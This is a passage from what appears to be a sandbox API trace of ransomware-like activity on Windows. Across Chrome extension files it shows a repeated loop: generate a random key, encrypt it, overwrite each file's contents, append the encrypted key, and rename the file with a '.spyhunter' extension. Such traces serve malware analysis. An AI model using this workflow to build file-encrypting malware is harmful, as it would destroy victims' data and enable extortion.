lpNumberOfBytesWritten=0x248f634, lpOverlapped=0x0 | out: lpBuffer=0x248f674*, lpNumberOfBytesWritten=0x248f634*=0x4, lpOverlapped=0x0) returned 1 [0134.370] WriteFile (in: hFile=0x17c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f634, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248f634*=0x30, lpOverlapped=0x0) returned 1 [0134.371] CloseHandle (hObject=0x17c) returned 1 [0134.371] GetProcessHeap () returned 0x2c0000 [0134.371] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f6eda0 [0134.371] wnsprintfW (in: pszDest=0x2f6eda0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv\\messages.json.spyhunter") returned 165 [0134.371] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv\\messages.json.spyhunter")) returned 1 [0134.372] GetProcessHeap () returned 0x2c0000 [0134.372] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6eda0 | out: hHeap=0x2c0000) returned 1 [0134.372] GetProcessHeap () returned 0x2c0000 [0134.372] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0134.372] GetProcessHeap () returned 0x2c0000 [0134.372] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f7f5a8 | out: hHeap=0x2c0000) returned 1 [0134.373] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f670 | out: pbBuffer=0x248f670) returned 1 [0134.373] GetProcessHeap () returned 0x2c0000 [0134.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0134.373] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248f668*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248f668*=0x30) returned 1 [0134.373] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0134.374] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr\\messages.json") returned 155 [0134.374] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0134.374] GetProcessHeap () returned 0x2c0000 [0134.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0134.374] ReadFile (in: hFile=0x17c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f62c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248f62c*=0xf8, lpOverlapped=0x0) returned 1 [0134.374] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffff08, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0134.375] WriteFile (in: hFile=0x17c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x248f62c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248f62c*=0xf8, lpOverlapped=0x0) returned 1 [0134.375] GetProcessHeap () returned 0x2c0000 [0134.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0134.375] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.375] WriteFile (in: hFile=0x17c, lpBuffer=0x248f66c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f62c, lpOverlapped=0x0 | out: lpBuffer=0x248f66c*, lpNumberOfBytesWritten=0x248f62c*=0x4, lpOverlapped=0x0) returned 1 [0134.375] WriteFile (in: hFile=0x17c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f62c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248f62c*=0x30, lpOverlapped=0x0) returned 1 [0134.375] CloseHandle (hObject=0x17c) returned 1 [0134.375] GetProcessHeap () returned 0x2c0000 [0134.375] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f6eda0 [0134.375] wnsprintfW (in: pszDest=0x2f6eda0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr\\messages.json.spyhunter") returned 165 [0134.375] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr\\messages.json.spyhunter")) returned 1 [0134.380] GetProcessHeap () returned 0x2c0000 [0134.380] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6eda0 | out: hHeap=0x2c0000) returned 1 [0134.380] GetProcessHeap () returned 0x2c0000 [0134.380] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0134.380] GetProcessHeap () returned 0x2c0000 [0134.380] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f7f298 | out: hHeap=0x2c0000) returned 1 [0134.381] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f668 | out: pbBuffer=0x248f668) returned 1 [0134.381] GetProcessHeap () returned 0x2c0000 [0134.381] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0134.381] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248f660*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248f660*=0x30) returned 1 [0134.381] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\verified_contents.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0135.142] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\verified_contents.json") returned 162 [0135.142] StrStrW (lpFirst="verified_contents.json", lpSrch=".txt") returned 0x0 [0135.142] GetProcessHeap () returned 0x2c0000 [0135.142] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0135.142] ReadFile (in: hFile=0xec, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f624, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248f624*=0x2800, lpOverlapped=0x0) returned 1 [0135.362] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0135.362] WriteFile (in: hFile=0xec, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f624, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248f624*=0x2800, lpOverlapped=0x0) returned 1 [0135.362] GetProcessHeap () returned 0x2c0000 [0135.363] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0135.363] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.363] WriteFile (in: hFile=0xec, lpBuffer=0x248f664*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f624, lpOverlapped=0x0 | out: lpBuffer=0x248f664*, lpNumberOfBytesWritten=0x248f624*=0x4, lpOverlapped=0x0) returned 1 [0135.363] WriteFile (in: hFile=0xec, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f624, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248f624*=0x30, lpOverlapped=0x0) returned 1 [0135.363] CloseHandle (hObject=0xec) returned 1 [0135.363] GetProcessHeap () returned 0x2c0000 [0135.363] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0135.363] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\verified_contents.json.spyhunter") returned 172 [0135.363] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\verified_contents.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\verified_contents.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\verified_contents.json.spyhunter")) returned 1 [0135.364] GetProcessHeap () returned 0x2c0000 [0135.364] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0135.364] GetProcessHeap () returned 0x2c0000 [0135.364] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0135.364] GetProcessHeap () returned 0x2c0000 [0135.364] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc6eb0 | out: hHeap=0x2c0000) returned 1 [0135.364] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f668 | out: pbBuffer=0x248f668) returned 1 [0135.364] GetProcessHeap () returned 0x2c0000 [0135.364] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0135.364] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248f660*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248f660*=0x30) returned 1 [0135.364] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0135.499] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\messages.json") returned 157 [0135.499] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0135.499] GetProcessHeap () returned 0x2c0000 [0135.499] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0135.499] ReadFile (in: hFile=0x158, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f624, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248f624*=0xb3, lpOverlapped=0x0) returned 1 [0135.500] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0135.500] WriteFile (in: hFile=0x158, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x248f624, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248f624*=0xb3, lpOverlapped=0x0) returned 1 [0135.500] GetProcessHeap () returned 0x2c0000 [0135.500] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0135.500] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.501] WriteFile (in: hFile=0x158, lpBuffer=0x248f664*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f624, lpOverlapped=0x0 | out: lpBuffer=0x248f664*, lpNumberOfBytesWritten=0x248f624*=0x4, lpOverlapped=0x0) returned 1 [0135.501] WriteFile (in: hFile=0x158, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f624, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248f624*=0x30, lpOverlapped=0x0) returned 1 [0135.501] CloseHandle (hObject=0x158) returned 1 [0135.501] GetProcessHeap () returned 0x2c0000 [0135.501] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0135.501] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\messages.json.spyhunter") returned 167 [0135.501] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\messages.json.spyhunter")) returned 1 [0135.502] GetProcessHeap () returned 0x2c0000 [0135.502] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0135.502] GetProcessHeap () returned 0x2c0000 [0135.502] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0135.502] GetProcessHeap () returned 0x2c0000 [0135.502] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f1bfd8 | out: hHeap=0x2c0000) returned 1 [0135.502] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f660 | out: pbBuffer=0x248f660) returned 1 [0135.503] GetProcessHeap () returned 0x2c0000 [0135.503] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0135.503] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248f658*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248f658*=0x30) returned 1 [0135.503] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\manifest.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0135.503] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\manifest.json") returned 145 [0135.503] StrStrW (lpFirst="manifest.json", lpSrch=".txt") returned 0x0 [0135.503] GetProcessHeap () returned 0x2c0000 [0135.503] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0135.504] ReadFile (in: hFile=0x158, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f61c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248f61c*=0x2d8, lpOverlapped=0x0) returned 1 [0135.617] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffd28, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0135.617] WriteFile (in: hFile=0x158, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2d8, lpNumberOfBytesWritten=0x248f61c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248f61c*=0x2d8, lpOverlapped=0x0) returned 1 [0135.617] GetProcessHeap () returned 0x2c0000 [0135.617] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0135.617] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.617] WriteFile (in: hFile=0x158, lpBuffer=0x248f65c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f61c, lpOverlapped=0x0 | out: lpBuffer=0x248f65c*, lpNumberOfBytesWritten=0x248f61c*=0x4, lpOverlapped=0x0) returned 1 [0135.617] WriteFile (in: hFile=0x158, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f61c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248f61c*=0x30, lpOverlapped=0x0) returned 1 [0135.617] CloseHandle (hObject=0x158) returned 1 [0135.618] GetProcessHeap () returned 0x2c0000 [0135.618] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0135.618] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\manifest.json.spyhunter") returned 155 [0135.618] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\manifest.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\manifest.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\manifest.json.spyhunter")) returned 1 [0135.618] GetProcessHeap () returned 0x2c0000 [0135.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0135.619] GetProcessHeap () returned 0x2c0000 [0135.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0135.619] GetProcessHeap () returned 0x2c0000 [0135.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e17dd8 | out: hHeap=0x2c0000) returned 1 [0135.620] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f658 | out: pbBuffer=0x248f658) returned 1 [0135.620] GetProcessHeap () returned 0x2c0000 [0135.620] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0135.620] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248f650*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248f650*=0x30) returned 1 [0135.620] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0135.620] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\messages.json") returned 157 [0135.620] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0135.620] GetProcessHeap () returned 0x2c0000 [0135.620] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0135.621] ReadFile (in: hFile=0x158, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f614, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248f614*=0xb3, lpOverlapped=0x0) returned 1 [0135.621] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0135.621] WriteFile (in: hFile=0x158, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x248f614, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248f614*=0xb3, lpOverlapped=0x0) returned 1 [0135.622] GetProcessHeap () returned 0x2c0000 [0135.622] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0135.622] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.622] WriteFile (in: hFile=0x158, lpBuffer=0x248f654*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f614, lpOverlapped=0x0 | out: lpBuffer=0x248f654*, lpNumberOfBytesWritten=0x248f614*=0x4, lpOverlapped=0x0) returned 1 [0135.622] WriteFile (in: hFile=0x158, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f614, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248f614*=0x30, lpOverlapped=0x0) returned 1 [0135.622] CloseHandle (hObject=0x158) returned 1 [0135.622] GetProcessHeap () returned 0x2c0000 [0135.622] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0135.624] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\messages.json.spyhunter") returned 167 [0135.624] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js 